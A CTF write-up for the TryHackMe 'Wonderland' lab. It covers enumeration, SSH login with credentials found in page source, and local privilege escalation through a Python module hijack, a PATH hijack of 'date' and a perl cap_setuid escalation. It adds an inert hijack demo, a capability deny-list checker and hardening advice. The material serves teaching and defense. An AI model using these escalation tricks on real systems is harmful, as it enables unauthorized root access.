d3vyce 095a13b2c9
add: writeup-ctf
2024-03-02 21:49:07 +01:00

---
title: "Writeup - Wonderland (THM)"
date: 2022-05-20
slug: "writeup-wonderland-thm"
type: "writeup-ctf"
---
This is a writeup for the [Wonderland](https://tryhackme.com/room/wonderland) machine from the TryHackMe site.
## Enumeration
First, let's scan the target for open ports and service versions:
```bash
nmap -sV -T4 -Pn 10.10.11.146
```
Two open TCP ports are discovered:
![](img/image-1.webp)
- 22/tcp : SSH port (OpenSSH 7.6p1)
- 80/tcp : HTTP web server
![](img/image-2.webp)
## Exploit
I start by fuzzing the web server for pages and directories:
![](img/image-3.webp)
When I go to the `r` page, I see the following message:
![](img/image-4.webp)
So I do a recursive scan to see the complete tree:
```bash
ffuf -c -u http://10.10.188.230/FUZZ -w wordlist/common.txt -recursion -recursion-depth 6
```
I finally find the following page:
![](img/image-5.webp)
Looking at the page source, I find a `p` tag hidden with `display: none;`. Its content looks very much like a `user:password` pair:
```html
<!DOCTYPE html>
<head>
<title>Enter wonderland</title>
<link rel="stylesheet" type="text/css" href="/main.css">
</head>
<body>
<h1>Open the door and enter wonderland</h1>
<p>"Oh, youre sure to do that," said the Cat, "if you only walk long enough."</p>
<p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
</p>
<p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
the other paw, "lives a March Hare. Visit either you like: theyre both mad."</p>
<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
<img src="/img/alice_door.png" style="height: 50rem;">
</body>
```
So I try these credentials over SSH:
![](img/image-6.webp)
I now have a shell as `alice` and can retrieve the first flag. Oddly, the user flag sits under `/root`, and it is readable by alice:
```bash
alice@wonderland:~$ cat /root/user.txt
thm{"Curiouser and curiouser!"}
```
## Privilege escalation
Listing `/home` shows several users:
```bash
alice@wonderland:/home$ ls
alice hatter rabbit tryhackme
```
Next I check alice's sudo permissions with `sudo -l`:
![](img/image-7.webp)
So I can run a Python script as the `rabbit` user. Let's look at the content of this script:
```python
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
[...]
And that was scarcely odd, because
Theyd eaten every one."""
for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)
```
I run it to confirm what it does:
![](img/image-8.webp)
So it's a script that prints 10 random lines from the poem embedded in it. The interesting part is `import random`: Python resolves imports by searching `sys.path`, and the first entry of `sys.path` is the directory of the script itself, ahead of the standard library. Since the script lives in a directory alice can write to, I create a `random.py` file next to it containing a shell spawn (a local interactive shell, not a reverse shell). When the script is executed as `rabbit`, `import random` loads my file instead of the real module. So I create this new file with the following content:
```python
import pty
pty.spawn("/bin/bash")
```
Now I run the script through sudo as `rabbit` with the following command:
![](img/image-9.webp)
In rabbit's home directory there is a binary named `teaParty`. Running `strings` on it reveals the following readable text:
```bash
[...]
Welcome to the tea party!
The Mad Hatter will be here soon./bin/echo -n 'Probably by ' && date --date='next hour' -RAsk very nicely, and I will give you some tea while you wait for him
[...]
```
The program runs `date` through a shell (the `/bin/echo ... && date` line is a command string handed to `sh -c`), and it does so without an absolute path, so the shell resolves `date` through whatever `PATH` the caller provides. Since `teaParty` executes as `hatter`, I can write my own script named `date` and put its directory at the front of `PATH`.
I start by creating the script with the following content:
```bash
#!/bin/bash
/bin/bash
```
Then I make the script executable and prepend rabbit's home directory, where I saved it, to the `PATH` variable:
```bash
chmod +x date
export PATH=/home/rabbit:$PATH
```
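How the `PATH` hijack works, as an added example rather than the `teaParty` binary itself: a program that calls `system("... && date")` hands the string to `/bin/sh -c`, and the shell resolves `date` through the `PATH` it inherited from the caller. The Python below plays the role of that program. It plants an inert `date` stand-in (it prints a marker instead of launching bash), runs the command with rabbit's modified `PATH`, and then runs the two fixed variants, an absolute `/bin/date` and a `PATH` that the program sets itself. The marker, the stand-in, `/bin/date` and the trusted `PATH` are assumptions for the demo.

```python
"""PATH hijacking of an unqualified `date` call, and two ways to close it.

Added example, not the teaParty binary from the writeup. It runs a shell
command string the way system() would, first with an attacker-controlled
PATH and then with the environment fixed, and reports which `date` ran.
"""
import os
import subprocess
import tempfile

MARKER = "HIJACKED-DATE"

# Stand-in for the attacker's /home/rabbit/date: prints a marker instead of
# executing /bin/bash, so the demo is inert.
FAKE_DATE = f"#!/bin/sh\necho {MARKER}\n"

# PATH a privileged program should set for itself instead of inheriting one
# (assumed layout; adjust for the target distribution).
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def run_with_path(command: str, path: str) -> str:
    """Run `command` via /bin/sh -c, as system() does, with the given PATH only."""
    proc = subprocess.run(["/bin/sh", "-c", command], capture_output=True,
                          text=True, env={"PATH": path}, check=False)
    return proc.stdout.strip()


def demo() -> dict:
    """Return, per variant, whether the planted `date` ran (True = hijacked)."""
    with tempfile.TemporaryDirectory() as evil_dir:
        fake = os.path.join(evil_dir, "date")
        with open(fake, "w") as fh:
            fh.write(FAKE_DATE)
        os.chmod(fake, 0o755)  # chmod +x date

        # export PATH=/home/rabbit:$PATH, with evil_dir standing in for /home/rabbit
        hijacked_path = f"{evil_dir}:{TRUSTED_PATH}"
        vulnerable = "date --date='next hour' -R"
        absolute = "/bin/date --date='next hour' -R"
        return {
            # relative command + inherited PATH: the planted script wins
            "relative_inherited_path": MARKER in run_with_path(vulnerable, hijacked_path),
            # fix 1: absolute path, PATH is never consulted
            "absolute_inherited_path": MARKER in run_with_path(absolute, hijacked_path),
            # fix 2: relative command, but the program resets PATH itself
            "relative_trusted_path": MARKER in run_with_path(vulnerable, TRUSTED_PATH),
        }


if __name__ == "__main__":
    for variant, hijacked in demo().items():
        print(f"{variant:25} hijacked={hijacked}")
```

The second fix is what a setuid-style program should do regardless of how it names its commands: scrub the environment (at least `PATH`, `IFS`, `LD_*`) before spawning anything, or better, avoid spawning a shell at all and use `execve` with a fixed path and a fixed environment.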
Running the program now drops me into a shell as `hatter`:
![](img/image-10.webp)
In hatter's home directory I find the following file:
```bash
hatter@wonderland:/home/hatter$ ls
password.txt
hatter@wonderland:/home/hatter$ cat password.txt
WhyIsARavenLikeAWritingDesk?
```
So I connect via SSH as `hatter` with this password:
![](img/image-11.webp)
Manual enumeration as `hatter` turns up nothing, so I run linpeas.sh. In its output I find the following lines:
![](img/image-12.webp)
The capabilities section of the GTFOBins page for [Perl](https://gtfobins.github.io/gtfobins/perl/#capabilities) gives a way to escalate when the perl binary carries the `cap_setuid` capability.
Using the following command, I get a root shell and can read the last flag:
![](img/image-13.webp)
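What linpeas flagged is a file capability on the perl binary; the GTFOBins entry linked above works because `cap_setuid` lets perl call `setuid(0)` before exec'ing a shell. The check below, an added example that is part of neither the writeup nor linpeas, parses the output of `getcap -r / 2>/dev/null` (both the older `path = caps+ep` and the newer `path caps=ep` formats), flags capabilities that hand out root, and produces the `setcap -r` commands that strip them. The sample output and the deny-list are constructed for the example.

```python
"""Triage `getcap -r / 2>/dev/null` output for capabilities that hand out root.

Added example, not from the original writeup or from linpeas. The sample
output below is constructed; run the real command on the target instead.
"""
import re
from typing import Dict, List

# Capabilities that let an unprivileged user become root more or less directly
# (GTFOBins' "Capabilities" entries rely on these). Deny-list for this check.
DANGEROUS_CAPS = {
    "cap_setuid": "setuid(0) then exec a shell (perl, python, ...)",
    "cap_setgid": "change group id, read group-restricted files",
    "cap_dac_override": "bypass file permission checks, read/write any file",
    "cap_dac_read_search": "bypass read/search checks, read any file",
    "cap_sys_admin": "mount and friends, effectively root",
    "cap_sys_ptrace": "attach to root processes, inject code",
    "cap_sys_module": "load kernel modules, kernel code execution",
    "cap_chown": "take ownership of /etc/shadow and the like",
    "cap_fowner": "bypass ownership checks, chmod any file",
}

# getcap has used two output formats:
#   older libcap:   /usr/bin/perl = cap_setuid+ep
#   libcap >= 2.41: /usr/bin/perl cap_setuid=ep
_LINE = re.compile(r"^(?P<path>\S+)\s+(?:=\s+)?(?P<caps>\S+)$")

# Constructed sample mixing both formats.
SAMPLE_GETCAP_OUTPUT = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/python3.8 cap_dac_override,cap_setuid=eip
"""


def parse_getcap(output: str) -> Dict[str, List[str]]:
    """Map each file path to the list of capability names it carries."""
    result: Dict[str, List[str]] = {}
    for line in output.splitlines():
        m = _LINE.match(line.strip())
        if not m:
            continue
        # Drop the action flags: "cap_a,cap_b+ep" or "cap_a,cap_b=eip" -> "cap_a,cap_b"
        names = re.split(r"[+=]", m.group("caps"), maxsplit=1)[0]
        result[m.group("path")] = [c.strip() for c in names.split(",") if c.strip()]
    return result


def dangerous_binaries(output: str) -> Dict[str, List[str]]:
    """Keep only the files whose capabilities appear in the deny-list."""
    return {
        path: [c for c in caps if c in DANGEROUS_CAPS]
        for path, caps in parse_getcap(output).items()
        if any(c in DANGEROUS_CAPS for c in caps)
    }


def remediation(output: str) -> List[str]:
    """Commands an administrator would run to strip the offending capabilities."""
    return [f"setcap -r {path}" for path in sorted(dangerous_binaries(output))]


if __name__ == "__main__":
    for path, caps in dangerous_binaries(SAMPLE_GETCAP_OUTPUT).items():
        reasons = "; ".join(DANGEROUS_CAPS[c] for c in caps)
        print(f"{path}: {', '.join(caps)}  ({reasons})")
    print("\n".join(remediation(SAMPLE_GETCAP_OUTPUT)))
```

`cap_net_raw` on `ping` is the normal, harmless case and is left alone; anything that shows up in the deny-list deserves the same treatment as a stray setuid binary.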
## Recommendations
To harden this host I would take the following actions:
- Do not embed credentials in served HTML; `display: none;` hides text from the browser, not from anyone reading the page source
- Do not grant `sudo` rights on scripts stored in a directory the invoking user can write to, since Python (like most interpreters) loads modules from the script's own directory before the standard library
- In programs that run with another user's privileges, such as `teaParty`, call commands by absolute path (`/bin/date`) or reset `PATH` before spawning a shell, and preferably avoid spawning a shell at all
- Do not store cleartext passwords in files such as `password.txt`, and do not reuse them as SSH passwords
- Remove the `cap_setuid` file capability from the Perl binary (`setcap -r /usr/bin/perl`) and audit the rest with `getcap -r / 2>/dev/null`